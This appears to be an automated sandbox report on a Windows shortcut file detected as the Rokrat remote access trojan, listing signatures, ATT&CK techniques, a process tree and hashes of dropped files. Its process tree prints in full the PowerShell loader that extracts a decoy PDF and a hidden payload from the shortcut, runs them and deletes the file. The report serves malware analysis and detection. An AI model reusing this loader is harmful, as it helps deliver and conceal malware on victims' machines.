Resubmissions

29-05-2024 10:21

240529-mdm2rsbc9s 10

08-04-2024 07:38

240408-jge9jsca66 10

Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    08-04-2024 07:38

General

  • Target

    358122718ba11b3e8bb56340dbe94f51.lnk

  • Size

    56.2MB

  • MD5

    358122718ba11b3e8bb56340dbe94f51

  • SHA1

    0c61effe0c06d57835ead4a574dde992515b9382

  • SHA256

    b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56

  • SHA512

    7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01

  • SSDEEP

    98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn

Score
10/10

Malware Config

Signatures

  • Detect Rokrat payload 2 IoCs
  • Rokrat

    Rokrat is a remote access trojan written in c++.

  • Blocklisted process makes network request 10 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        3⤵
          PID:2512
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
          3⤵
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2088
          • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.pdf"
            4⤵
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:2408
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1892
            • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
              5⤵
              • Blocklisted process makes network request
              • Checks BIOS information in registry
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1500
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_bh24br2.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1908
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DCF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8DCE.tmp"
                  7⤵
                    PID:1548
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\exvjtrvq.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1028
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E9A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8E99.tmp"
                    7⤵
                      PID:856
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ebtcyimr.cmdline"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1328
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8F17.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8F16.tmp"
                      7⤵
                        PID:2844
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v8cafk67.cmdline"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1688
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8FB3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8FB2.tmp"
                        7⤵
                          PID:2280

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            2
            T1082

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\358122718ba11b3e8bb56340dbe94f51.pdf
              Filesize

              4.7MB

              MD5

              29ec187f2ed2eca0953dca0a68ac3722

              SHA1

              a20557b2e4a8b2c5e8a735c5d2f30aeaad01726e

              SHA256

              81269c3c41d957765314a1704e0ea6cdf9666eab729597207fd1cc844c749beb

              SHA512

              890a37f5e8fbe4d1cef6d52ec0c7b6dbf378f3545a59cdef1d796fee0aec8662564cdfd86f019f8e6bd60d8c678b72746200a1ce917a867bd21546ed06ac2bc8

            • C:\Users\Admin\AppData\Local\Temp\RES8DCF.tmp
              Filesize

              1KB

              MD5

              412c8cf112e0dd6407736fce70d28f7d

              SHA1

              9be62a31458407f92437adaf6da38bd6fcfa1bc6

              SHA256

              1d180b53f41ef86fcbcf0680f5ffe7ceb9b06e96d2bbe459bc6a6e0ad11c7092

              SHA512

              f0f3738bb04e11b84ff8ab6d768ab0f44284a2992242101cf71f270d324a526f991a92607b552c5d85ace89b1ceb06deb30238e4cbe4953c69dac675f1344b8f

            • C:\Users\Admin\AppData\Local\Temp\RES8E9A.tmp
              Filesize

              1KB

              MD5

              62a444f6b7c6390cce3ac102cb32a677

              SHA1

              d44ebb0db5fe2139597a70df55ccd9ae58b7498f

              SHA256

              4595193479aec562f0de8e8ec66d68e9c78d3791fb6f96915730c8ffd4769fa9

              SHA512

              465422915d5e662465874ed7f492c31a6cb2e6e62160d458d6433831e7538c42bb8f99d7df0ba6c244e6ebe3e63453bf2fc9d8c6c86b6838e700709a29438fbb

            • C:\Users\Admin\AppData\Local\Temp\RES8F17.tmp
              Filesize

              1KB

              MD5

              d8cbc1599dc49ebb7d793ca2ac3bd1f5

              SHA1

              08d96b0ad6b8c8b67327d7a682a1f77b536ee4c7

              SHA256

              64522f3d03ea823d9b19fc32ac17f8b5a53daa0c30bfaf0e897edb606fdc5af9

              SHA512

              ebfe3d2888a966dca21fd8a20d41aedf07705b47c33319debded4096d0ad0cfbd3fb607551299117ead44399c706015c21c35f102fec338454b51afe5a239da9

            • C:\Users\Admin\AppData\Local\Temp\RES8FB3.tmp
              Filesize

              1KB

              MD5

              9d2dddb0165d79e756201b02501109a2

              SHA1

              babef5380204baed4bede56db006bf724d5ab3e1

              SHA256

              1ed42976695ce90bcf49fc5017535f1cc49619b109eb7e59fdc8bad67b0ae841

              SHA512

              065464449dd606dcaa35ffe9eeefab0e8aa433ba42258cf486dfaf0b7c0ea2fadd4231bc685bc5fbdabea1f044e25ea403a9f6a9320e5872aadf4f653381c0b2

            • C:\Users\Admin\AppData\Local\Temp\_bh24br2.dll
              Filesize

              3KB

              MD5

              6f13a1f0052da3b1715f2068655d9f84

              SHA1

              9c59aca84660b10563ae52a6799335fa0fe2b406

              SHA256

              51d12022c0803493b48ea1ceb53ea4d4753d41ded7014e1504b3d2be9d97ad87

              SHA512

              e5f056d49096c621fb6d0eb32c1c4a012ecc884d843a8d773ae6a1eace10bfb3954dbeee5bb594cb45d81b2152bfd36c927aa00ace1cb3f2f2dd89d7fb615534

            • C:\Users\Admin\AppData\Local\Temp\_bh24br2.pdb
              Filesize

              7KB

              MD5

              3741f358cda7aad017d9b679665fc175

              SHA1

              44e9525aefaf18d585cdc93cd8310836ec1f3ba1

              SHA256

              7d565b84c23515da5635966dbc2c1a761ed2124608df2ed03e16f5307cde9ae0

              SHA512

              ae513565ef5d8bcea872e33863b19145bbd90c8633a82a7d5c87687e87fc3b80fc2be4566f233e794a47bb104301547617bac88b1058dbda5893e1eedd28cf62

            • C:\Users\Admin\AppData\Local\Temp\ebtcyimr.dll
              Filesize

              3KB

              MD5

              84e71935cbf647d3efca798c7bce6e1a

              SHA1

              9a40ce0114ed4cddffcf3b10721f2828e79cff54

              SHA256

              162e3a7698e54100c69ddb6f0819d0b50d13bc07d798aee5bd1b0474a038df71

              SHA512

              9d02b7ce48075942801c38c829fa1273375fb0ed8f8fc47a3e164b2d6c9d5cbdc7bae6fac17b5ee1242833bb155a2f661b299b16de4434706af0e58274c5afde

            • C:\Users\Admin\AppData\Local\Temp\ebtcyimr.pdb
              Filesize

              7KB

              MD5

              dd0320a47bed7682a44a837def6ffdb9

              SHA1

              19424f6ebd9c546189f8ed6edae9487cbe342324

              SHA256

              7d25ce7a9a86ff821835b44cce75069ed75bfaa3b1ade829ca2e4309bc839032

              SHA512

              1ad05a640bc9edd86706187deee00698d4722e9d4c313d9c44fe6368491ff7b74ec3cd408246208c6cda670ba01afdef8b319644b4ed8738ed105e2f67c5b470

            • C:\Users\Admin\AppData\Local\Temp\exvjtrvq.dll
              Filesize

              3KB

              MD5

              0d5e8af01b4f135af9cfc4cf1a3ed0c2

              SHA1

              fe60cc4cc64f20b24a3852738ef888dcd363416d

              SHA256

              6c8eb137cc6ec1a70d7c69b1f22e41ea62dd013911c6ca0c1f15adc7a48ffde5

              SHA512

              ab128fc2785c435b0319aae9dd28b88bf750c4ced486353a3b1d0b1a0d47604ee59246a1437f9b9281de27ef1f9077539f333a3ab400ba44682e7fd1367a87df

            • C:\Users\Admin\AppData\Local\Temp\exvjtrvq.pdb
              Filesize

              7KB

              MD5

              3c233f031a9e0dcb0f72722d5ecf4d7d

              SHA1

              8d1a8cdf0842095059d6ba82e48bd7c3d85e8c07

              SHA256

              ec5f986b5a6e1127eeaab795d62f047e16f33345c7a84cb9e39355c776516dc2

              SHA512

              2c7d8b41e13bcf386411cd4c513be413c9d3490f9ed017423daa9ddd675b1dae427220ce027e6227775abefbaffdb0ec11240c5c3406de53b559ad2c65ff79bf

            • C:\Users\Admin\AppData\Local\Temp\para.dat
              Filesize

              1KB

              MD5

              655f58dcd7cd8bd996076ad4b492ae00

              SHA1

              7d69d7926de1ad560f0d002bd768eb182177cca4

              SHA256

              4e9d83e270910fa2610a2bdb0fef2bc2f5a2c257ce8c9eb5ba3f73eb051f5cf7

              SHA512

              87575186d8674c4be4f736db9b008b5ef975a21b60d38a635ad874dd399b5263fc6cba94e6010681c6262241df3b1f3074411c815121141414727c326d70e204

            • C:\Users\Admin\AppData\Local\Temp\price.bat
              Filesize

              311B

              MD5

              f5787b3e60fad2b255ebc54d0ce747dc

              SHA1

              830705c5417f11c730cd8bbde4a2a709671cc11d

              SHA256

              a43f7b080c30816997fc15589f904365917f30ae15441b22fbda11aec2ddf1c0

              SHA512

              1e702414e37c90da42457295653e4df5a64208476206e001d8c23edfe5b8e7e5145672b5e0abf5bc4667e4e059735066db4c0a6a04cca259eb96e7755ce6cd8f

            • C:\Users\Admin\AppData\Local\Temp\v8cafk67.dll
              Filesize

              3KB

              MD5

              168859e35a8859f28560dc6dae077f93

              SHA1

              31c4e960b5425d98aea2b3a642036d02bba724e5

              SHA256

              ed3dcc3f14b2fcfae73b878e6b3cea38c1820a63a09796e53689eea7b758a8b3

              SHA512

              a1206db627d8b4df2951951013d7fa29236bbdae0a8b5610b8234d194be78e6506504f6221f4b74dcbe27567509e2bfc8a5ca6cd93c7ed1ef7180a4fb8181e51

            • C:\Users\Admin\AppData\Local\Temp\v8cafk67.pdb
              Filesize

              7KB

              MD5

              418fbe21241b6c7dab1a98a9704a586b

              SHA1

              9c922410b08c99df41e5f1a6f44c2b91a4b920da

              SHA256

              714e71bdfbf462f9f67e99452e4e12877f88ad937aa3336c9f6e287e23eee030

              SHA512

              a76e0e14c5ae0d74e478415851e9021304b04e71887288913e2e67b6873fb947348b115960223038447dc998e75fd4f440ca7c96f3adcd514b460f111b6fa22e

            • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
              Filesize

              3KB

              MD5

              912cf03ed2de795491ab3bf2b3fe2508

              SHA1

              4334d4de3a84b792a94eb56880e3472b450ee7bf

              SHA256

              d2eba6ee75799de78351d4fa11bb89dcf8dc8e5420f62bff1351a689275abeea

              SHA512

              36f9d4876a63f9f94ae17ce371552eda22f5bad7df887f4ed26f59f830af070ef0cf1af238f31d42bf8aedfcff14296a95488e23a3ae4aefc1bd28fa1a9bc0db

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              Filesize

              7KB

              MD5

              b93fdb5aad8789609871b8d75be8b7d5

              SHA1

              70b0ebe86b72bb0cc2aae506298fb52530c365cf

              SHA256

              62d945eced682b5a1b43be10bb46f86d14e14c66e281dc0c65b2db8377bb63d3

              SHA512

              686ffbefa7f81aeab2e10233c2879093f5b3f2998c411acecd16f2bd3933634ac74a017da895b802e434d20cc0dda3fb12534642185aee78667f387b0dd14ef7

            • C:\Users\Public\panic.dat
              Filesize

              869KB

              MD5

              a043b3a2af9db6173e3a39b5c501a9bd

              SHA1

              4250f3855e53ccf755f8a05b1998f55dfa4b2c0e

              SHA256

              dc6ca2e9ce800245a65715647bb1614c35632f270d1879e796472e786cdfc0fc

              SHA512

              a667c8521589e96ba57b2ae6e429f43a352c36968edb4cadf57500a1a5e39511b3e7109bb2c372b9567c8e50777cfc71f0cb8150f2782a6a8ac9d90222f802f5

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC8DCE.tmp
              Filesize

              652B

              MD5

              2b35afe3d980b84c92ef5034fab05c99

              SHA1

              f6ddd56167629c25cecb141a22e335a1983857db

              SHA256

              af87e12827bb38a43fca0d05a787a009c1dd3449bbee4317221aa26a2fade3a7

              SHA512

              838cd18468af876ee19f350ee3535f788aeddab33423bd40e1224c1c5ca467140803fcb3dd752492d96d22e4b4734025de401c5c4de63d29f41e06e255855d1e

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC8E99.tmp
              Filesize

              652B

              MD5

              5afd6fc9b6669620b1f4af3328cc4b46

              SHA1

              0fc6d5dd21b8f27b89eaa3a1259236e6b26a9942

              SHA256

              6d4ad691cf1ed75994d2b626f7b2aecab88ef7bb1b10c77fc96e16dabeb79c65

              SHA512

              66d9ac44d2354eab3ab3ef5fc51219cb364d71dc9491ecbb067008e62bdef48375e8e194357dc462105643efcc8700133be868b64a891b4c8090594c13e28be6

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC8F16.tmp
              Filesize

              652B

              MD5

              07439c6f2f44e119c5c740726d88bd94

              SHA1

              bca71a8b79ad2491d37aaea89aed302eecf69d86

              SHA256

              6365ab4ac73f7984297868c857d74e78da327a8bd543b0c08f783d248f4332ea

              SHA512

              fc98586c2a289087f3666b22ff43436e61b4fbe1305d398e319eb0952082b484418c22bd31b3ce1817a64666a8b97a72afd483e3836213a59815bd9ec3b1616f

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC8FB2.tmp
              Filesize

              652B

              MD5

              5ba8d65caa6bb7eda3ff1be71ef2bef9

              SHA1

              15888279ec6f2daf62de81e5e6445ce0dc678bb4

              SHA256

              a9d5fba3d84b08c8d2062ab03752eea169e50fa12184e4e7faf513dccddd3548

              SHA512

              caf49a4be37784bb12d5a3c2de5c923b82f508f3234f7c8e5ae8ded6872cb25132a721559f39066e8dcccde01fb2a9ec36bffc681b140d3ed6479f8bad314f7c

            • \??\c:\Users\Admin\AppData\Local\Temp\_bh24br2.0.cs
              Filesize

              249B

              MD5

              69ecfeb3e9a8fb7890d114ec056ffd6d

              SHA1

              cba5334d2ffe24c60ef793a3f6a7f08067a913db

              SHA256

              0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

              SHA512

              be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

            • \??\c:\Users\Admin\AppData\Local\Temp\_bh24br2.cmdline
              Filesize

              309B

              MD5

              14382e34086da493f13c1c211c5bdc97

              SHA1

              3e10704aa9d2b45ea867446e9eadba8f3eee7560

              SHA256

              673ac9bfd487abb6bf6f91c1d9c2bcbcc6ac7117ee8fa00f524cc6f1dc43b90f

              SHA512

              5f73aa82130446ac90ca4a21fa73b9e76d4ea76f4e7071d6a5127b3ab4d390d318476b059107c5ac8720d110f2c0b8d0716ddca12008db1964bcb22c5feddde7

            • \??\c:\Users\Admin\AppData\Local\Temp\ebtcyimr.0.cs
              Filesize

              286B

              MD5

              b23df8158ffd79f95b9bddd18738270b

              SHA1

              79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

              SHA256

              856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

              SHA512

              e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

            • \??\c:\Users\Admin\AppData\Local\Temp\ebtcyimr.cmdline
              Filesize

              309B

              MD5

              f7872d41786f9244655438b03a4a63cb

              SHA1

              9ddc3269fe2c1930189a29b7c1fbbfb9680943d0

              SHA256

              ca88999d16be3a26df05010bdcd4cb2ce868608583c20d680a5b3c9b194f9d4e

              SHA512

              905b6eae4014e9052311cf06cd5a15a779fe6adb76dd3ab3bf2541e41884da9453f4a0af2b414b5a3f30c978748acf9aa42c1e53b3a03e9d3c4f10ebe1fccd4d

            • \??\c:\Users\Admin\AppData\Local\Temp\exvjtrvq.0.cs
              Filesize

              272B

              MD5

              4de985ae7f625fc7a2ff3ace5a46e3c6

              SHA1

              935986466ba0b620860f36bf08f08721827771cb

              SHA256

              53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

              SHA512

              067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

            • \??\c:\Users\Admin\AppData\Local\Temp\exvjtrvq.cmdline
              Filesize

              309B

              MD5

              bc0e8f9cd6e47259e1b4da61ec1a1314

              SHA1

              5fc915ce62d789ed5fee5044e69aa9761ce38402

              SHA256

              4ef0956bb34a9ca547d7448b85e86f03700db763af2d944fde7cd8da5aab88c6

              SHA512

              896518cda59ff766aa198b986409b3d914d10137e916062564c1837e882c54d6d760328e910a56d052b763aa3828ed008ce3599b49f5305e2500d5a3360de7e2

            • \??\c:\Users\Admin\AppData\Local\Temp\v8cafk67.0.cs
              Filesize

              259B

              MD5

              560e1b883a997afcfa3b73d8a5cddbc1

              SHA1

              2905f3f296ac3c7d6a020fb61f0819dbea2f1569

              SHA256

              e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

              SHA512

              041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

            • \??\c:\Users\Admin\AppData\Local\Temp\v8cafk67.cmdline
              Filesize

              309B

              MD5

              c8281c238c8456db218b5cda26473c4f

              SHA1

              51fed57bc61b68fbf5a374f7764f7fa515237e40

              SHA256

              f779b2428f23413b1fa9b2460d3a660964ff49070e6af5bb0a52a1ec247c848b

              SHA512

              ddabb3cc6729a5613c8c7d1c7f7c271b9a4216712e5b9be3067d3364551f1ba77f931325b5efc9b1281b9e7c76e43a9ebbc38becfc31468c9e57eaca7f87c869

            • memory/1028-103-0x0000000000430000-0x0000000000470000-memory.dmp
              Filesize

              256KB

            • memory/1328-119-0x0000000001F70000-0x0000000001FB0000-memory.dmp
              Filesize

              256KB

            • memory/1500-146-0x00000000050B0000-0x000000000518A000-memory.dmp
              Filesize

              872KB

            • memory/1500-147-0x00000000027C0000-0x0000000002800000-memory.dmp
              Filesize

              256KB

            • memory/1500-150-0x0000000072E90000-0x000000007343B000-memory.dmp
              Filesize

              5.7MB

            • memory/1500-60-0x00000000027C0000-0x0000000002800000-memory.dmp
              Filesize

              256KB

            • memory/1500-61-0x0000000072E90000-0x000000007343B000-memory.dmp
              Filesize

              5.7MB

            • memory/1500-151-0x000000000C0C0000-0x000000000C1A3000-memory.dmp
              Filesize

              908KB

            • memory/1500-149-0x000000000C0C0000-0x000000000C1A3000-memory.dmp
              Filesize

              908KB

            • memory/1500-59-0x0000000072E90000-0x000000007343B000-memory.dmp
              Filesize

              5.7MB

            • memory/1500-145-0x0000000072E90000-0x000000007343B000-memory.dmp
              Filesize

              5.7MB

            • memory/1500-148-0x00000000050B0000-0x000000000518A000-memory.dmp
              Filesize

              872KB

            • memory/1908-87-0x00000000004C0000-0x0000000000500000-memory.dmp
              Filesize

              256KB

            • memory/2088-40-0x0000000002460000-0x00000000024A0000-memory.dmp
              Filesize

              256KB

            • memory/2088-39-0x0000000073820000-0x0000000073DCB000-memory.dmp
              Filesize

              5.7MB

            • memory/2088-41-0x0000000002460000-0x00000000024A0000-memory.dmp
              Filesize

              256KB

            • memory/2088-38-0x0000000073820000-0x0000000073DCB000-memory.dmp
              Filesize

              5.7MB

            • memory/2088-53-0x0000000073820000-0x0000000073DCB000-memory.dmp
              Filesize

              5.7MB